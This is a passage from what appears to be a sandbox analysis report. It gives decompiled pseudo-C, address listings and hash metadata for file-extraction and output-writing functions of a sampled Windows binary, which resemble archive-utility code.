							 *((char*)(_t347 - 4)) = 7;
							_t217 = E003C332F(_t347 - 0xc0);
							L73:
							E003B1E40(E003B1E40(E003B1E40(E003B1E40(_t217,  *((intOrPtr*)(_t347 - 0x80))),  *((intOrPtr*)(_t347 - 0x40))),  *(_t347 - 0x74)),  *((intOrPtr*)(_t347 - 0x34)));
							 *((char*)(_t347 - 4)) = 0;
							E003B1E40(E003D0A72(0, _t347 - 0x58),  *((intOrPtr*)(_t347 - 0x24)));
							 *[fs:0x0] =  *((intOrPtr*)(_t347 - 0xc));
							return _t343;
						} else {
							goto L17;
						}
						do {
							L17:
							__eflags =  *(_t347 + 0x17);
							if(__eflags != 0) {
								L25:
								_push(_t347 - 0xc0);
								_push(_t338);
								_t243 = L003D7C71( *((intOrPtr*)(_t347 - 0x14)), __eflags);
								__eflags = _t243;
								if(_t243 != 0) {
									goto L46;
								}
								__eflags =  *(_t347 - 0x8e);
								if( *(_t347 - 0x8e) == 0) {
									_t245 =  *(_t342 + 3);
								} else {
									_t245 =  *(_t342 + 2);
								}
								__eflags = _t245;
								if(_t245 != 0) {
									goto L43;
								} else {
									L30:
									__eflags =  *(_t342 + 0x28);
									if( *(_t342 + 0x28) != 0) {
										L32:
										__eflags =  *(_t347 + 0x17);
										if( *(_t347 + 0x17) == 0) {
											L40:
											__eflags =  *(_t347 - 0xd);
											if(__eflags != 0) {
												L42:
												E003EF23F(_t347 - 0x24);
												_t106 = _t347 - 0x20;
												 *_t106 =  *(_t347 - 0x20) + 1;
												__eflags =  *_t106;
												 *((intOrPtr*)( *((intOrPtr*)(_t347 - 0x24)) +  *(_t347 - 0x20) * 4)) = _t338;
												goto L43;
											}
											_t248 = L003C3D16( *(_t347 + 0x10), __eflags);
											__eflags = _t248;
											if(_t248 == 0) {
												goto L43;
											}
											goto L42;
										}
										_t249 = E003B4255( *((intOrPtr*)(_t347 - 0xa8)),  *((intOrPtr*)(_t347 - 0x40)));
										__eflags = _t249;
										if(_t249 == 0) {
											L39:
											 *(_t347 + 0x17) = 0;
											goto L40;
										}
										_t251 =  *((intOrPtr*)( *((intOrPtr*)(_t347 - 0xa8)) +  *(_t347 - 0x3c) * 2));
										__eflags = _t251;
										if(_t251 != 0) {
											__eflags = _t251 - 0x5c;
											if(_t251 == 0x5c) {
												goto L40;
											}
											__eflags = _t251 - 0x2f;
											if(_t251 == 0x2f) {
												goto L40;
											}
											goto L39;
										}
										__eflags =  *(_t347 - 0x8d);
										if( *(_t347 - 0x8d) != 0) {
											goto L40;
										}
										goto L39;
									}
									__eflags =  *(_t347 - 0x90);
									if( *(_t347 - 0x90) != 0) {
										goto L43;
									}
									goto L32;
								}
							}
							__eflags =  *(_t347 - 0xd);
							if(__eflags == 0) {
								goto L25;
							}
							__eflags =  *(_t342 + 2);
							if(__eflags != 0) {
								goto L25;
							}
							__eflags =  *(_t342 + 3);
							if(__eflags != 0) {
								goto L25;
							}
							__eflags =  *(_t342 + 0x28);
							 *(_t347 - 0x90) = 0;
							if( *(_t342 + 0x28) != 0) {
								goto L32;
							}
							_t252 =  *((intOrPtr*)(_t347 - 0x14));
							__eflags =  *(_t252 + 0x14);
							if( *(_t252 + 0x14) == 0) {
								goto L30;
							}
							_t243 = L003D784D(_t347 - 0x90);
							__eflags = _t243;
							if(_t243 != 0) {
								goto L46;
							} else {
								goto L30;
							}
							L43:
							_t338 = _t338 + 1;
							__eflags = _t338 -  *(_t347 - 0x18);
						} while (_t338 <  *(_t347 - 0x18));
						goto L44;
					}
					L15:
					_t343 = _t217;
					goto L73;
				}
			}



































                                                                                                    0x003d193f
                                                                                                    0x003d1944
                                                                                                    0x003d1952
                                                                                                    0x003d1954
                                                                                                    0x003d195e
                                                                                                    0x003d1962
                                                                                                    0x003d1965
                                                                                                    0x003d1968
                                                                                                    0x003d196a
                                                                                                    0x003d196f
                                                                                                    0x003d1972
                                                                                                    0x003d1975
                                                                                                    0x003d1978
                                                                                                    0x003d197e
                                                                                                    0x003d1981
                                                                                                    0x003d1986
                                                                                                    0x003d198c
                                                                                                    0x003d1990
                                                                                                    0x003d1994
                                                                                                    0x003d19a2
                                                                                                    0x003d19a7
                                                                                                    0x003d19b0
                                                                                                    0x003d19b4
                                                                                                    0x003d19b8
                                                                                                    0x003d19ba
                                                                                                    0x003d19bf
                                                                                                    0x003d19dd
                                                                                                    0x003d19e4
                                                                                                    0x003d19e4
                                                                                                    0x003d19bf
                                                                                                    0x003d19e9
                                                                                                    0x003d19ef
                                                                                                    0x003d19fe
                                                                                                    0x003d1a02
                                                                                                    0x003d1a0c
                                                                                                    0x003d1a18
                                                                                                    0x003d1a20
                                                                                                    0x003d1a24
                                                                                                    0x003d1a2a
                                                                                                    0x003d1a31
                                                                                                    0x003d1a3d
                                                                                                    0x003d1a41
                                                                                                    0x003d1a48
                                                                                                    0x003d1a4c
                                                                                                    0x003d1a57
                                                                                                    0x003d1a66
                                                                                                    0x003d1a6a
                                                                                                    0x003d1a6f
                                                                                                    0x003d1a74
                                                                                                    0x003d1a76
                                                                                                    0x003d1a79
                                                                                                    0x003d1a82
                                                                                                    0x003d1a8a
                                                                                                    0x003d1a8b
                                                                                                    0x003d1a8e
                                                                                                    0x003d1a8e
                                                                                                    0x003d1a95
                                                                                                    0x003d1a9e
                                                                                                    0x003d1aa3
                                                                                                    0x003d1aa3
                                                                                                    0x003d1a95
                                                                                                    0x003d1aaa
                                                                                                    0x003d1aae
                                                                                                    0x003d1ab3
                                                                                                    0x003d1abf
                                                                                                    0x003d1ac2
                                                                                                    0x003d1c29
                                                                                                    0x003d1c29
                                                                                                    0x003d1c2c
                                                                                                    0x003d1c31
                                                                                                    0x003d1c3c
                                                                                                    0x003d1c3d
                                                                                                    0x003d1c3d
                                                                                                    0x003d1c42
                                                                                                    0x003d1c45
                                                                                                    0x003d1cbe
                                                                                                    0x003d1cc3
                                                                                                    0x003d1cc5
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003d1ccc
                                                                                                    0x003d1cd1
                                                                                                    0x003d1cd9
                                                                                                    0x003d1cda
                                                                                                    0x00000000
                                                                                                    0x003d1c47
                                                                                                    0x003d1c4f
                                                                                                    0x003d1c54
                                                                                                    0x003d1c5a
                                                                                                    0x003d1c7b
                                                                                                    0x003d1c81
                                                                                                    0x003d1c85
                                                                                                    0x003d1c8a
                                                                                                    0x003d1c8d
                                                                                                    0x003d1cac
                                                                                                    0x003d1cac
                                                                                                    0x003d1caf
                                                                                                    0x003d1ce4
                                                                                                    0x003d1ce4
                                                                                                    0x003d1ce6
                                                                                                    0x003d1ce6
                                                                                                    0x003d1ce9
                                                                                                    0x003d1cec
                                                                                                    0x003d1cf0
                                                                                                    0x003d1d3b
                                                                                                    0x003d1d4c
                                                                                                    0x003d1cf2
                                                                                                    0x003d1cf2
                                                                                                    0x003d1d00
                                                                                                    0x003d1d03
                                                                                                    0x003d1d07
                                                                                                    0x003d1d0b
                                                                                                    0x003d1d17
                                                                                                    0x003d1d1b
                                                                                                    0x003d1d1e
                                                                                                    0x003d1d20
                                                                                                    0x003d1d28
                                                                                                    0x003d1d28
                                                                                                    0x003d1d30
                                                                                                    0x003d1d34
                                                                                                    0x003d1d34
                                                                                                    0x003d1d4f
                                                                                                    0x003d1d51
                                                                                                    0x003d1d53
                                                                                                    0x003d1d57
                                                                                                    0x003d1d5c
                                                                                                    0x003d1d5c
                                                                                                    0x003d1d5f
                                                                                                    0x003d1d62
                                                                                                    0x003d1d64
                                                                                                    0x003d1d64
                                                                                                    0x003d1d6f
                                                                                                    0x003d1d72
                                                                                                    0x003d1d75
                                                                                                    0x003d1d77
                                                                                                    0x003d1d79
                                                                                                    0x003d1d7d
                                                                                                    0x003d1d7f
                                                                                                    0x003d1d7f
                                                                                                    0x00000000
                                                                                                    0x003d1d7d
                                                                                                    0x003d1cb1
                                                                                                    0x003d1cb1
                                                                                                    0x003d1cb4
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003d1cb6
                                                                                                    0x003d1cb8
                                                                                                    0x00000000
                                                                                                    0x003d1cb8
                                                                                                    0x003d1c8f
                                                                                                    0x003d1c92
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003d1c94
                                                                                                    0x003d1c97
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003d1c9f
                                                                                                    0x003d1ca4
                                                                                                    0x003d1ca6
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003d1ca6
                                                                                                    0x003d1ac8
                                                                                                    0x003d1ac8
                                                                                                    0x003d1ad2
                                                                                                    0x003d1ad7
                                                                                                    0x003d1ae6
                                                                                                    0x003d1aeb
                                                                                                    0x003d1aed
                                                                                                    0x003d1af0
                                                                                                    0x003d1af4
                                                                                                    0x003d1bed
                                                                                                    0x003d1bed
                                                                                                    0x003d1bf0
                                                                                                    0x003d1c20
                                                                                                    0x003d1c24
                                                                                                    0x00000000
                                                                                                    0x003d1c24
                                                                                                    0x003d1bf2
                                                                                                    0x003d1bf9
                                                                                                    0x003d1c01
                                                                                                    0x003d1c04
                                                                                                    0x003d1c0a
                                                                                                    0x003d1c0c
                                                                                                    0x003d1c10
                                                                                                    0x003d1d84
                                                                                                    0x003d1d9f
                                                                                                    0x003d1daa
                                                                                                    0x003d1db5
                                                                                                    0x003d1dc3
                                                                                                    0x003d1dcb
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003d1afa
                                                                                                    0x003d1afa
                                                                                                    0x003d1afa
                                                                                                    0x003d1afd
                                                                                                    0x003d1b3d
                                                                                                    0x003d1b46
                                                                                                    0x003d1b47
                                                                                                    0x003d1b48
                                                                                                    0x003d1b4d
                                                                                                    0x003d1b4f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003d1b55
                                                                                                    0x003d1b5b
                                                                                                    0x003d1b62
                                                                                                    0x003d1b5d
                                                                                                    0x003d1b5d
                                                                                                    0x003d1b5d
                                                                                                    0x003d1b65
                                                                                                    0x003d1b67
                                                                                                    0x00000000
                                                                                                    0x003d1b69
                                                                                                    0x003d1b69
                                                                                                    0x003d1b69
                                                                                                    0x003d1b6c
                                                                                                    0x003d1b76
                                                                                                    0x003d1b76
                                                                                                    0x003d1b79
                                                                                                    0x003d1bb8
                                                                                                    0x003d1bb8
                                                                                                    0x003d1bbb
                                                                                                    0x003d1bcf
                                                                                                    0x003d1bd2
                                                                                                    0x003d1bdd
                                                                                                    0x003d1bdd
                                                                                                    0x003d1bdd
                                                                                                    0x003d1be0
                                                                                                    0x00000000
                                                                                                    0x003d1be0
                                                                                                    0x003d1bc6
                                                                                                    0x003d1bcb
                                                                                                    0x003d1bcd
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003d1bcd
                                                                                                    0x003d1b84
                                                                                                    0x003d1b89
                                                                                                    0x003d1b8b
                                                                                                    0x003d1bb5
                                                                                                    0x003d1bb5
                                                                                                    0x00000000
                                                                                                    0x003d1bb5
                                                                                                    0x003d1b96
                                                                                                    0x003d1b9a
                                                                                                    0x003d1b9d
                                                                                                    0x003d1ba9
                                                                                                    0x003d1bad
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003d1baf
                                                                                                    0x003d1bb3
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003d1bb3
                                                                                                    0x003d1b9f
                                                                                                    0x003d1ba5
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003d1ba7
                                                                                                    0x003d1b6e
                                                                                                    0x003d1b74
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003d1b74
                                                                                                    0x003d1b67
                                                                                                    0x003d1aff
                                                                                                    0x003d1b02
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003d1b04
                                                                                                    0x003d1b07
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003d1b09
                                                                                                    0x003d1b0c
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003d1b0e
                                                                                                    0x003d1b11
                                                                                                    0x003d1b17
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003d1b19
                                                                                                    0x003d1b1c
                                                                                                    0x003d1b1f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003d1b2e
                                                                                                    0x003d1b33
                                                                                                    0x003d1b35
                                                                                                    0x00000000
                                                                                                    0x003d1b3b
                                                                                                    0x00000000
                                                                                                    0x003d1b3b
                                                                                                    0x003d1be3
                                                                                                    0x003d1be3
                                                                                                    0x003d1be4
                                                                                                    0x003d1be4
                                                                                                    0x00000000
                                                                                                    0x003d1afa
                                                                                                    0x003d1ad9
                                                                                                    0x003d1ad9
                                                                                                    0x00000000
                                                                                                    0x003d1ad9

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003D1944
                                                                                                      • Part of subcall function 003B5AE6: __EH_prolog.LIBCMT ref: 003B5AEB
                                                                                                      • Part of subcall function 003C2DE8: _CxxThrowException.MSVCRT(?,0042FFC8), ref: 003C2E16
                                                                                                      • Part of subcall function 003B92C9: VariantClear.OLEAUT32(?), ref: 003B92EB
                                                                                                    Strings
                                                                                                    • Cannot create output directory, xrefs: 003D1CD4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog$ClearExceptionThrowVariant
                                                                                                    • String ID: Cannot create output directory
                                                                                                    • API String ID: 814188403-1181934277
                                                                                                    • Opcode ID: 65e0785c483c9bc6bf75cac0bd87101690410ff36ce0e543ba68d1ff2f8249d7
                                                                                                    • Instruction ID: ecd3f1bcea440dc9e4d9120ff4d1a53482c1fffd85cba72eb4a9ab0d4ed9c02e
                                                                                                    • Opcode Fuzzy Hash: 65e0785c483c9bc6bf75cac0bd87101690410ff36ce0e543ba68d1ff2f8249d7
                                                                                                    • Instruction Fuzzy Hash: F9F1D432901289EFCF26EFA4D890AEEBBB5BF15304F14409EE445AB352D730AE45DB51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003EB5FA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 92%
                                                                                                    			E003EB5FA(void* __ecx, void* __edi, char _a4) {
				signed int _v8;
				char* _v12;
				signed char* _t22;
				char* _t25;
				int _t29;
				signed int _t33;
				signed int _t40;
				void* _t46;
				intOrPtr* _t50;
				void* _t52;
				void* _t56;

				_push(__ecx);
				_push(__ecx);
				_t56 = __ecx;
				_t33 =  *(__ecx + 0x48);
				_v8 = _t33;
				if(_t33 != 0) {
					_t50 = __ecx + 0x50;
					_t24 = _t33 + 2;
					if(_t33 + 2 >  *((intOrPtr*)(_t50 + 8))) {
						E003B257E(_t50, _t24);
					}
					_t25 =  *_t50;
					_v12 = _t25;
					 *_t25 = 0xd;
					_t7 = _t25 + 1; // 0x1
					_t46 = _t7;
					if(_t33 > 0) {
						_t52 = _t46;
						_t40 = _t33 >> 2;
						_t29 = memset(_t52, 0x20202020, _t40 << 2);
						_t46 = _t46 + _v8;
						memset(_t52 + _t40, _t29, (_t33 & 0x00000003) << 0);
						_t25 = _v12;
					}
					 *_t46 = 0xd;
					 *(_t46 + 1) =  *(_t46 + 1) & 0x00000000;
					 *((intOrPtr*)(_t56 + 0x54)) = _t46 + 1 - _t25;
					fputs( *(_t56 + 0x50),  *( *(_t56 + 0xa4))); // executed
				}
				if(_a4 != 0) {
					L003B1F91( *(_t56 + 0xa4));
				}
				_t22 =  *(_t56 + 0x44);
				 *(_t56 + 0x48) =  *(_t56 + 0x48) & 0x00000000;
				 *_t22 =  *_t22 & 0x00000000;
				return _t22;
			}














                                                                                                    0x003eb5fd
                                                                                                    0x003eb5fe
                                                                                                    0x003eb601
                                                                                                    0x003eb603
                                                                                                    0x003eb608
                                                                                                    0x003eb60b
                                                                                                    0x003eb60e
                                                                                                    0x003eb611
                                                                                                    0x003eb617
                                                                                                    0x003eb61c
                                                                                                    0x003eb61c
                                                                                                    0x003eb621
                                                                                                    0x003eb625
                                                                                                    0x003eb628
                                                                                                    0x003eb62b
                                                                                                    0x003eb62b
                                                                                                    0x003eb62e
                                                                                                    0x003eb637
                                                                                                    0x003eb639
                                                                                                    0x003eb63c
                                                                                                    0x003eb643
                                                                                                    0x003eb646
                                                                                                    0x003eb648
                                                                                                    0x003eb648
                                                                                                    0x003eb64b
                                                                                                    0x003eb64e
                                                                                                    0x003eb655
                                                                                                    0x003eb663
                                                                                                    0x003eb66b
                                                                                                    0x003eb670
                                                                                                    0x003eb678
                                                                                                    0x003eb678
                                                                                                    0x003eb67d
                                                                                                    0x003eb680
                                                                                                    0x003eb686
                                                                                                    0x003eb68a

                                                                                                    APIs
                                                                                                    • fputs.MSVCRT ref: 003EB663
                                                                                                      • Part of subcall function 003B257E: _CxxThrowException.MSVCRT(?,0042FFC8), ref: 003B25A0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionThrowfputs
                                                                                                    • String ID:
                                                                                                    • API String ID: 1334390793-399585960
                                                                                                    • Opcode ID: bce71ae7223d71a422c988880df438f685abc8ed2940f3f7e764ba05d8201be7
                                                                                                    • Instruction ID: f1ca886e804b8e720ba367936fb4c172cbe0e5c7e9dec1442952164400807d6b
                                                                                                    • Opcode Fuzzy Hash: bce71ae7223d71a422c988880df438f685abc8ed2940f3f7e764ba05d8201be7
                                                                                                    • Instruction Fuzzy Hash: C511BF716047449FDB26CF59C8D1BAAFBE6EF4A304F05456EE1868B290C7B5BC44C760
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003E4E43 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 90%
                                                                                                    			E003E4E43(void* __ecx, void* __edi, intOrPtr _a4, char* _a8) {
				void* __ebp;
				void* _t18;
				char* _t23;
				struct _IO_FILE** _t38;
				void* _t40;

				_t40 = __ecx;
				_t18 = E003E571F();
				if(_t18 == 0) {
					 *((intOrPtr*)(__ecx + 0x10c)) =  *((intOrPtr*)(__ecx + 0x10c)) + 1;
					asm("adc [eax+0x4], ebx");
					 *((char*)(__ecx + 0x114)) = 0;
					 *((char*)(__ecx + 0x115)) = 0;
					 *((intOrPtr*)(__ecx + 0x154)) = 0;
					 *((intOrPtr*)(__ecx + 0x158)) = 0;
					E003E4AF9(__ecx - 4);
					_t38 =  *(__ecx + 0xc4);
					if(_t38 != 0) {
						_t23 =  *0x42c1fc; // 0x42c498
						if(_a8 == 0) {
							_t23 =  *0x42c1f8; // 0x42c4ac
						}
						_a8 = _t23;
						E003B1FA0(_t38);
						fputs(_a8,  *_t38); // executed
						_push(_a4);
						E003B211A( *((intOrPtr*)(_t40 + 0xc4))); // executed
						E003B1FA0( *((intOrPtr*)(_t40 + 0xc4)));
					}
					if( *((intOrPtr*)(_t40 + 0xb8)) != 0) {
						E003B2711(_t40 + 0x2c, "Open");
					}
					return 0;
				}
				return _t18;
			}








                                                                                                    0x003e4e48
                                                                                                    0x003e4e4a
                                                                                                    0x003e4e53
                                                                                                    0x003e4e59
                                                                                                    0x003e4e6a
                                                                                                    0x003e4e6d
                                                                                                    0x003e4e73
                                                                                                    0x003e4e79
                                                                                                    0x003e4e7f
                                                                                                    0x003e4e85
                                                                                                    0x003e4e8a
                                                                                                    0x003e4e92
                                                                                                    0x003e4e97
                                                                                                    0x003e4e9c
                                                                                                    0x003e4e9e
                                                                                                    0x003e4e9e
                                                                                                    0x003e4ea5
                                                                                                    0x003e4ea8
                                                                                                    0x003e4eb2
                                                                                                    0x003e4eba
                                                                                                    0x003e4ec3
                                                                                                    0x003e4ece
                                                                                                    0x003e4ece
                                                                                                    0x003e4eda
                                                                                                    0x003e4ee4
                                                                                                    0x003e4ee4
                                                                                                    0x00000000
                                                                                                    0x003e4ee9
                                                                                                    0x003e4eee

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: fputs
                                                                                                    • String ID: Open
                                                                                                    • API String ID: 1795875747-71445658
                                                                                                    • Opcode ID: ce3e911d7089c54dce8b8658e457683bd5bc236b24404044ee2916b063285eb0
                                                                                                    • Instruction ID: f3c0803bff32e8f34c3f85473af6b28f377ff1d220a300a57d318132502a3fd6
                                                                                                    • Opcode Fuzzy Hash: ce3e911d7089c54dce8b8658e457683bd5bc236b24404044ee2916b063285eb0
                                                                                                    • Instruction Fuzzy Hash: C211A0312017409FD722EF35DC92AEAB7E5FF54314F50862EE59A87191DB706804CF54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003C44C4 Relevance: 3.3, APIs: 2, Instructions: 253COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 87%
                                                                                                    			E003C44C4(void* __ecx, void* __eflags) {
				void* _t80;
				signed int _t84;
				signed int _t89;
				signed int _t93;
				intOrPtr _t95;
				signed int _t99;
				long _t100;
				signed int _t101;
				signed int _t104;
				void* _t106;
				void* _t114;
				void* _t115;
				intOrPtr* _t119;
				signed int _t121;
				char _t124;
				void* _t143;
				signed int _t162;
				signed int _t176;
				void* _t179;
				signed int _t180;
				signed int _t182;
				void* _t183;

				E0041F1B0(0x423c8f, _t183);
				_t179 = __ecx;
				 *((char*)( *((intOrPtr*)(_t183 + 0xc)))) = 1;
				E003B64DB(_t183 - 0x5c);
				E003B2D47(_t183 - 0x34);
				_t176 =  *(_t183 + 8);
				_t124 = 0;
				 *((intOrPtr*)(_t183 - 4)) = 0;
				_t80 = E003B695D(_t183 - 0x5c,  *_t176, 0); // executed
				if(_t80 == 0) {
					_t180 = E003B859C( *_t176, __eflags);
					__eflags = _t180;
					if(_t180 < 0) {
						L55:
						 *((char*)( *((intOrPtr*)(_t183 + 0xc)))) = _t124;
						E003B1E40( *((intOrPtr*)(_t183 + 0xc)),  *((intOrPtr*)(_t183 - 0x34)));
						_t84 = 0;
						__eflags = 0;
						L56:
						 *[fs:0x0] =  *((intOrPtr*)(_t183 - 0xc));
						return _t84;
					}
					__eflags =  *( *_t176 + 2 + _t180 * 2);
					if(__eflags == 0) {
						goto L55;
					}
					E003B2E5F(_t183 - 0x18, __eflags, _t176);
					__eflags = _t180 -  *(_t183 - 0x14);
					 *((char*)(_t183 - 4)) = 5;
					if(_t180 <  *(_t183 - 0x14)) {
						 *(_t183 - 0x14) = _t180;
						 *((short*)( *((intOrPtr*)(_t183 - 0x18)) + _t180 * 2)) = 0;
					}
					E003B64DB(_t183 - 0xa0);
					E003B2D47(_t183 - 0x78);
					 *((char*)(_t183 - 4)) = 6;
					_t89 = E003B695D(_t183 - 0xa0,  *((intOrPtr*)(_t183 - 0x18)), _t124);
					__eflags = _t89;
					if(_t89 != 0) {
						_t162 =  *(_t183 - 0x80);
						__eflags = _t162 & 0x00000001;
						if((_t162 & 0x00000001) != 0) {
							__eflags = _t162 & 0xfffffffe;
							_t89 = E003B5762( *((intOrPtr*)(_t183 - 0x18)), _t162 & 0xfffffffe);
						}
					}
					E003B1E40(E003B1E40(_t89,  *((intOrPtr*)(_t183 - 0x78))),  *((intOrPtr*)(_t183 - 0x18)));
					L54:
					goto L55;
				}
				_t93 =  *(__ecx + 0x48);
				if(_t93 == 2) {
					L43:
					_t182 = 0;
					__eflags = 0;
					L44:
					E003B1E40(_t93,  *((intOrPtr*)(_t183 - 0x34)));
					L45:
					_t84 = _t182;
					goto L56;
				}
				if(_t93 != 0) {
					L20:
					_t95 =  *((intOrPtr*)(_t179 + 0x48));
					__eflags = _t95 - 3;
					if(__eflags != 0) {
						__eflags = _t95 - 4;
						if(__eflags != 0) {
							_t143 =  *_t176;
							__eflags =  *(_t183 - 0x3c) >> 0x00000004 & 0x00000001;
							if(__eflags == 0) {
								__eflags = E003B6F23(_t143, __eflags);
								if(__eflags == 0) {
									goto L55;
								}
								_t99 = L003B5D6C( *_t176, __eflags);
								__eflags = _t99;
								if(_t99 != 0) {
									goto L55;
								}
								_t100 = GetLastError();
								__eflags = _t100 - 2;
								if(_t100 == 2) {
									goto L55;
								}
								_push(_t176);
								_push( *0x42a38c);
								L42:
								_t93 = L003C3A05(_t179);
								__eflags = _t93 - _t124;
								if(_t93 != _t124) {
									L23:
									_t182 = _t93;
									goto L44;
								}
								goto L43;
							}
							_t101 = L003B5803(_t143);
							__eflags = _t101;
							if(_t101 != 0) {
								goto L55;
							}
							_push(_t176);
							_push( *0x42a390);
							goto L42;
						}
						E003B2E5F(_t183 - 0x18, __eflags, _t176);
						 *((char*)(_t183 - 4)) = 4;
						__eflags = E003BAB82(_t183 - 0x18, __eflags);
						if(__eflags != 0) {
							_t104 = L003B5885( *_t176,  *((intOrPtr*)(_t183 - 0x18)));
							__eflags = _t104;
							if(_t104 != 0) {
								E003B1E40(_t104,  *((intOrPtr*)(_t183 - 0x18)));
								goto L54;
							}
							_t106 = E003B7253();
							_push(_t176);
							_push(_t183 - 0x18);
							_push( *0x42a388);
							_push(_t106);
							_t107 = L003C3A9B(_t179, __eflags);
							L31:
							__eflags = _t107 - _t124;
							_t182 = _t107;
							if(_t107 == _t124) {
								_t182 = 0x80004005;
							}
							_push( *((intOrPtr*)(_t183 - 0x18)));
							L13:
							E003B1E40(E003B1E40(_t107),  *((intOrPtr*)(_t183 - 0x34)));
							goto L45;
						}
						_push(_t176);
						_push( *0x42a384);
						_t107 = L003C3998(_t179, __eflags);
						goto L31;
					}
					__eflags = E003BAB82(_t176, __eflags);
					if(__eflags != 0) {
						 *((char*)(_t179 + 0x1f0)) = 1;
						goto L55;
					}
					_push(_t176);
					_push( *0x42a384);
					_t93 = L003C3998(_t179, __eflags);
					__eflags = _t93 - _t124;
					if(_t93 == _t124) {
						_t182 = 0x80004005;
						goto L44;
					}
					goto L23;
				}
				_t114 = E003C47D5(_t176, _t183 - 0x68, E003B325D(_t176) + 1);
				 *((char*)(_t183 - 4)) = 1;
				_t115 = E003B2CEC(_t183 - 0x24, _t114, _t183 - 0x34);
				 *((char*)(_t183 - 4)) = 3;
				E003B1E40(_t115,  *((intOrPtr*)(_t183 - 0x68)));
				asm("sbb edx, edx");
				 *(_t183 - 0x14) =  *(_t183 - 0x44);
				asm("sbb edx, edx");
				 *((intOrPtr*)(_t183 - 0x10)) =  *((intOrPtr*)(_t183 - 0x40));
				_t119 =  *((intOrPtr*)(_t179 + 0x50));
				_t107 =  *((intOrPtr*)( *_t119 + 0x14))(_t119,  *((intOrPtr*)(_t183 - 0x24)), _t183 - 0x14, _t183 - 0x5c,  *((intOrPtr*)(_t179 + 0x80)),  ~( *(_t179 + 0xfb)) & _t179 + 0x000000f0,  ~( *(_t179 + 0x3b)) & _t179 + 0x00000108, _t183 + 8);
				_t124 = 0;
				if(_t107 == 0) {
					_t121 =  *(_t183 + 8);
					__eflags = _t121;
					if(_t121 == 0) {
						L19:
						 *((char*)(_t183 - 4)) = _t124;
						E003B1E40(_t121,  *((intOrPtr*)(_t183 - 0x24)));
						goto L20;
					}
					_t121 = _t121 - 1;
					__eflags = _t121;
					if(_t121 == 0) {
						 *((intOrPtr*)(_t179 + 0x48)) = 1;
						goto L19;
					}
					_t107 = _t121 - 1;
					__eflags = _t107;
					if(_t107 == 0) {
						L17:
